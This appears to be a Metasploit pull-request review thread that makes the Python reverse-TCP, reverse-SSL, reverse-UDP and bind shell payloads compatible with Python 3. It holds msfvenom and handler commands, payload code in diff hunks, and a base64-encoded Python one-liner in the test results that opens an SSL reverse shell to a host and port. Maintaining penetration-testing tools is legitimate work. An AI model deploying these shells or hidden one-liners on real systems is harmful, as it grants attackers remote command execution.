### PR TITLE
fix #14207, fix python/shell_reverse_tcp on python3

### LINKED ISSUE #14207: Python shell reverse tcp Syntax error
Hi everyone. I'm trying to make a python shell reverse tcp but when I'm trying to run it on terminal i get this error :

  _File "shells.py", line 6
    buf = 
         ^
SyntaxError: invalid syntax_

Anyone can help me ?

### PR DESCRIPTION
**Pull request by timwr**
Fix #14207 
It seems like the python/shell_reverse_tcp doesn't work with python3 (Python 3.8.5)

## Verification

List the steps needed to make sure this thing works

- [ ] Run a handler: `./msfconsole -qx "use exploit/multi/handler; set payload python/shell_reverse_tcp; set LHOST 127.0.0.1; set LPORT 4444; run"`
- [ ] Run `./msfvenom -p python/shell_reverse_tcp LHOST=127.0.0.1 LPORT=4444 -o out.py && python3 out.py`
- [ ] **Verify** you get a session

Marking this is a draft because I still need to test python2 and ensure the 'exit' command still exits the shell.

### CODE REVIEW

**Comment by timwr** [comment]
I think this is ready, python 2.4.6 worked fine. Exit/Ctrl-D did not work previously but I can fix it separately if needed.

File: modules/payloads/singles/python/shell_bind_tcp.rb [hunk 1]
```diff
@@ -49,8 +50,6 @@ def command_string
     cmd << "\tstdout_value=stdout.read()+stderr.read()\n"
     cmd << "\tso.send(stdout_value)\n"
 
-   # base64
-   cmd = "exec('#{Rex::Text.encode_base64(cmd)}'.decode('base64'))"
-   cmd
+    py_create_exec_stub(cmd)
```
Comment (smcintyre-r7) [inline modules/payloads/singles/python/shell_bind_tcp.rb:53]: 2.7 works, however I'm getting an error due to `os.popen3` not being available on Python3. Looks like that will need to be updated too.

File: modules/payloads/singles/python/shell_reverse_tcp_ssl.rb [hunk 2]
```diff
@@ -60,10 +61,7 @@ def command_string
     cmd += "\tstdout_value=proc.stdout.read() + proc.stderr.read()\n"
     cmd += "\ts.sendall(stdout_value)\n"
 
-    # Base64 encoding is required in order to handle Python's formatting requirements in the while loop
-    cmd = "exec('#{Rex::Text.encode_base64(cmd)}'.decode('base64'))"
-
-    cmd
+    py_create_exec_stub(cmd)
```
Comment (smcintyre-r7) [inline modules/payloads/singles/python/shell_reverse_tcp_ssl.rb:64]: <details>
<summary>Test Results</summary>

```
pyenv-each -d 1 -- -c "exec(__import__('base64').b64decode(__import__('codecs').getencoder('utf-8')('aW1wb3J0IHNvY2tldCxzdWJwcm9jZXNzLG9zLHNzbApzbz1zb2NrZXQuc29ja2V0KHNvY2tldC5BRl9JTkVULHNvY2tldC5TT0NLX1NUUkVBTSkKc28uY29ubmVjdCgoJzE5Mi4xNjguMTU5LjEyOCcsNDQ0NCkpCnM9c3NsLndyYXBfc29ja2V0KHNvKQpOST1GYWxzZQp3aGlsZSBub3QgTkk6CglkYXRhPXMucmVjdigxMDI0KQoJaWYgbGVuKGRhdGEpPT0wOgoJCU5JID0gVHJ1ZQoJcHJvYz1zdWJwcm9jZXNzLlBvcGVuKGRhdGEsc2hlbGw9VHJ1ZSxzdGRvdXQ9c3VicHJvY2Vzcy5QSVBFLHN0ZGVycj1zdWJwcm9jZXNzLlBJUEUsc3RkaW49c3VicHJvY2Vzcy5QSVBFKQoJc3Rkb3V0X3ZhbHVlPXByb2Muc3Rkb3V0LnJlYWQoKSArIHByb2Muc3RkZXJyLnJlYWQoKQoJcy5zZW5kYWxsKHN0ZG91dF92YWx1ZSkK')[0]))"
[*] [2.3.7  ] Running...
[-] [2.3.7  ] Status: FAILED WITH STATUS 1
[*] [2.4.6  ] Running...
[-] [2.4.6  ] Status: FAILED WITH STATUS 1
[*] [2.5.5  ] Running...
[-] [2.5.5  ] Status: FAILED WITH STATUS 1
[*] [2.5.6  ] Running...
[-] [2.5.6  ] Status: FAILED WITH STATUS 1
[*] [2.6.9  ] Running...
[+] [2.6.9  ] Status: SUCCESSFUL
[*] [2.7.17 ] Running...
[+] [2.7.17 ] Status: SUCCESSFUL
[*] [3.1.5  ] Running...
[-] [3.1.5  ] Status: FAILED WITH STATUS 1
[*] [3.2.6  ] Running...
[-] [3.2.6  ] Status: FAILED WITH STATUS 1
[*] [3.4.10 ] Running...
[+] [3.4.10 ] Status: SUCCESSFUL
[*] [3.5.9  ] Running...
[+] [3.5.9  ] Status: SUCCESSFUL
[*] [3.6.10 ] Running...
[+] [3.6.10 ] Status: SUCCESSFUL
[*] [3.7.7  ] Running...
[+] [3.7.7  ] Status: SUCCESSFUL
[*] [3.8.2  ] Running...
[+] [3.8.2  ] Status: SUCCESSFUL
```
</details>

File: modules/payloads/singles/python/shell_reverse_udp.rb [hunk 3]
```diff
@@ -47,22 +48,19 @@ def command_string
...
-    cmd << "\tstdout_value=stdout.read()+stderr.read()\n"
+    cmd << "\tp=subprocess.Popen(data, shell=True, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n"
+    cmd << "\tstdout_value=p.stdout.read()+p.stderr.read()\n"
     cmd << "\tso.send(stdout_value)\n"
 
-    # Base64 encoding is required in order to handle Python's formatting requirements in the while loop
-    cmd = "exec('#{Rex::Text.encode_base64(cmd)}'.decode('base64'))"
-
-    cmd
+    py_create_exec_stub(cmd)
```
Comment (smcintyre-r7) [inline modules/payloads/singles/python/shell_reverse_udp.rb:63]: This one is not working for my on Python 2.7 or 3.7. I don't get a session established, and Python just hangs. There's no stacktrace or visible error.

**Review by smcintyre-r7 — CHANGES_REQUESTED** [review]
I was able to test the two reverse TCP ones and I included their results. For all of these, would you mind updating the payload information to include the new versions that they work on? For example `shell_reverse_tcp` is 2.4-2.7 and 3.4+ while `shell_reverse_tcp_ssl` is 2.6-2.7 and 3.4+.

The Bind TCP stager looks like it needs another `os.popen3` reference to be updated for 3.x compatibility and I don't know what's up with the Reverse UDP stager but I couldn't get it to establish a session.

Would you also be able to please update the cached payload sizes so the unit tests pass?

If it's helpful, this is the test harness I use:

<details>
<summary>Test Harness</summary>

```bash
#!/usr/bin/env bash

set -e

delay=0
timeout=10
params=()
show_help () {
  echo "usage: $(basename $0) [-h] args"
  echo ""
  echo "positional arguments:"
  echo "  args           the arguments to pass to Python"
  echo ""
  echo "optional arguments:"
  echo "  -d, --delay    the amount of time in seconds to wait between tests (default: $delay)"
  echo "  -t, --timeout  the amount of time in seconds to wait for Python to exit (default: $timeout)"
}

while (( "$#" )); do
  case "$1" in
    -h|--help)
      show_help
      exit 0
      ;;
    -d|--delay)
      if [ -n "$2" ] && [ ${2:0:1} != "-" ]; then
        if ! [[ "$2" =~ ^[0-9]+$ ]] ; then
          echo "Error: Argument for $1 must be a number ($2)" >&2
          exit 1
        fi
        delay=$2
        shift 2
      else
        echo "Error: Argument for $1 is missing" >&2
        exit 1
      fi
      ;;
    -t|--timeout)
      if [ -n "$2" ] && [ ${2:0:1} != "-" ]; then
        if ! [[ "$2" =~ ^[0-9]+$ ]] ; then
          echo "Error: Argument for $1 must be a number ($2)" >&2
          exit 1
        fi
        timeout=$2
        shift 2
      else
        echo "Error: Argument for $1 is missing" >&2
        exit 1
      fi
      ;;
    --)       # end argument parsing
      shift
      break
      ;;
    -*|--*=)  # unsupported flags
      printf "\e[1;31m[-]\e[0m Unsupported flag $1\n" >&2
      exit 1
      ;;
    *)        # preserve positional arguments
      params+=("$1")
      shift
      ;;
  esac
done

params+=("$@")

if ! type "pyenv" &> /dev/null; then
  printf "\e[1;31m[-]\e[0m Error: pyenv was not found\n"
  exit 1
fi

eval "$(pyenv init -)"

set +e
for version in $(ls $PYENV_ROOT/versions); do
  printf "\e[1;34m[*]\e[0m [%-7s] Running...\n" "$version"

  pyenv shell $version
  timeout $timeout python "${params[@]}" &> /dev/null

  retval=$?
  if [ $retval -ne 0 ]; then
    printf "\e[1;31m[-]\e[0m [%-7s] Status: \e[1;5;31mFAILED WITH STATUS $retval\e[0m\n" "$version"
  else
    printf "\e[1;32m[+]\e[0m [%-7s] Status: \e[1;32mSUCCESSFUL\e[0m\n" "$version"
  fi

  if [ $delay -ne 0 ]; then
    sleep $delay
  fi
done
```
</details>

**Comment by smcintyre-r7** [comment]
Also I want to explicitly call out that this breaks compatibility with Python 2.3 for `shell_reverse_tcp` but I think it's a small price to pay for supporting 2.4+ / 3.x which is more important these days.

**Comment by timwr** [comment]
Thanks for testing @smcintyre-r7 !
Do you know if the failures are a regression or not?
Presumably there is no better function than Popen we can use for maximum compatibility.

I also wonder if it's worth trying to add support for these versions with some kind of runtime version check. It may increase the payload size a lot. I'm not sure if that's something we care about. If that's a concern we could expose it as an option but I'm not sure what the default would be.

File: modules/payloads/singles/python/shell_bind_tcp.rb [hunk 4]
```diff
@@ -35,22 +36,20 @@ def generate
 
   def command_string
     cmd = ''
-    dead = Rex::Text.rand_text_alpha(2)
+    dead = Rex::Text.rand_text_alpha(3)
     # Set up the socket
-    cmd << "import socket,os\n"
+    cmd << "import socket,subprocess\n"
```
Comment (acammack-r7) [inline modules/payloads/singles/python/shell_bind_tcp.rb:41]:
```suggestion
    cmd << "import socket as s\n"
    cmd << "import subprocess as r\n"
```

File: modules/payloads/singles/python/shell_bind_tcp.rb [hunk 5]
```diff
@@ -35,22 +36,20 @@ def generate
...
     cmd << "so=socket.socket(socket.AF_INET,socket.SOCK_STREAM)\n"
     cmd << "so.bind(('#{datastore['RHOST']}',#{ datastore['LPORT']}))\n"
     cmd << "so.listen(1)\n"
     cmd << "so,addr=so.accept()\n"
     cmd << "#{dead}=False\n"
     cmd << "while not #{dead}:\n"
     cmd << "\tdata=so.recv(1024)\n"
-    cmd << "\tstdin,stdout,stderr,=os.popen3(data)\n"
-    cmd << "\tstdout_value=stdout.read()+stderr.read()\n"
+    cmd << "\tp=subprocess.Popen(data, shell=True, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n"
```
Comment (acammack-r7) [inline modules/payloads/singles/python/shell_bind_tcp.rb:49]:
```suggestion
    cmd << "\tp=r.Popen(data, shell=True, stdin=r.PIPE, stdout=r.PIPE, stderr=r.PIPE)\n"
```

File: modules/payloads/singles/python/shell_bind_tcp.rb [hunk 6]
```diff
@@ -35,22 +36,20 @@ def generate
 
   def command_string
     cmd = ''
-    dead = Rex::Text.rand_text_alpha(2)
+    dead = Rex::Text.rand_text_alpha(3)
     # Set up the socket
-    cmd << "import socket,os\n"
+    cmd << "import socket,subprocess\n"
     cmd << "so=socket.socket(socket.AF_INET,socket.SOCK_STREAM)\n"
```
Comment (acammack-r7) [inline modules/payloads/singles/python/shell_bind_tcp.rb:42]:
```suggestion
    cmd << "so=s.socket(s.AF_INET,s.SOCK_STREAM)\n"
```

**Review by acammack-r7 — DISMISSED** [review]
Great to see these updated for compatibility! To help mitigate the size increase from the more verbose `subprocess` API, we can take this opportunity to golf the modules a bit with import aliases.

File: modules/payloads/singles/python/shell_reverse_udp.rb (hunk 3 above)
Comment (timwr) [reply modules/payloads/singles/python/shell_reverse_udp.rb:62]: This is still broken. I'll check how/if it worked before

**Comment by timwr** [comment]
I think msftidy needs updating here to handle mixed tabs and spaces in heredocs :(

File: modules/payloads/singles/python/shell_reverse_udp.rb (hunk 3 above)
Comment (smcintyre-r7) [reply modules/payloads/singles/python/shell_reverse_udp.rb:62]: Thanks! Let me know when you'd like me to retest it.

**Comment by timwr** [comment]
This should be ready now. The python/shell_reverse_udp payload should work now (I've no idea how it was working before) and I think we support the maximum number of python versions in a sensible way.
In theory we could support more versions if we checked the version at runtime and included different version specific code, but that would increase the size and complexity.
I can also add support for exiting the shell with `exit` and Ctrl+D if needed but this wasn't implemented before, and Ctrl+C is working already.

File: modules/payloads/singles/python/shell_reverse_udp.rb (hunk 3 above)
Comment (smcintyre-r7) [reply modules/payloads/singles/python/shell_reverse_udp.rb:62]: This fails now on versions 2.3, 2.4, and 2.5 however it is working on 2.6, 2.7, and 3.4+. The issues with 2.3-2.5 seem to be the `b'` prefix for the bytes literal, and the issues with 3.1-3.2 (I couldn't test 3.3) was the `execv` call has to take strings instead of bytes. I think this version coverage is sufficient and I'll just update the module to note it accurately.

**Comment by smcintyre-r7** [comment]
Tested all 4 payloads on Linux with Python versions 2.3 - 3.8 and everything looks good. I am ready to land this, the only outstanding issue seems to be the unit tests. I pushed up 6bdc7a1 which updates the descriptions, most importantly with the correct version info for the UDP payload.

Once I figure out the issue with the unit tests I'll get this landed. Assuming the unit tests are some kinda issue with the size, I'll handle that so you don't need to worry about it. Thanks alot @timwr !

**Review by smcintyre-r7 — APPROVED** [review]

**Comment by smcintyre-r7** [comment]
# Release Notes
This updates the four Python shell payloads to be compatible with Python version 3.4+ while retaining compatibility with 2.6+.
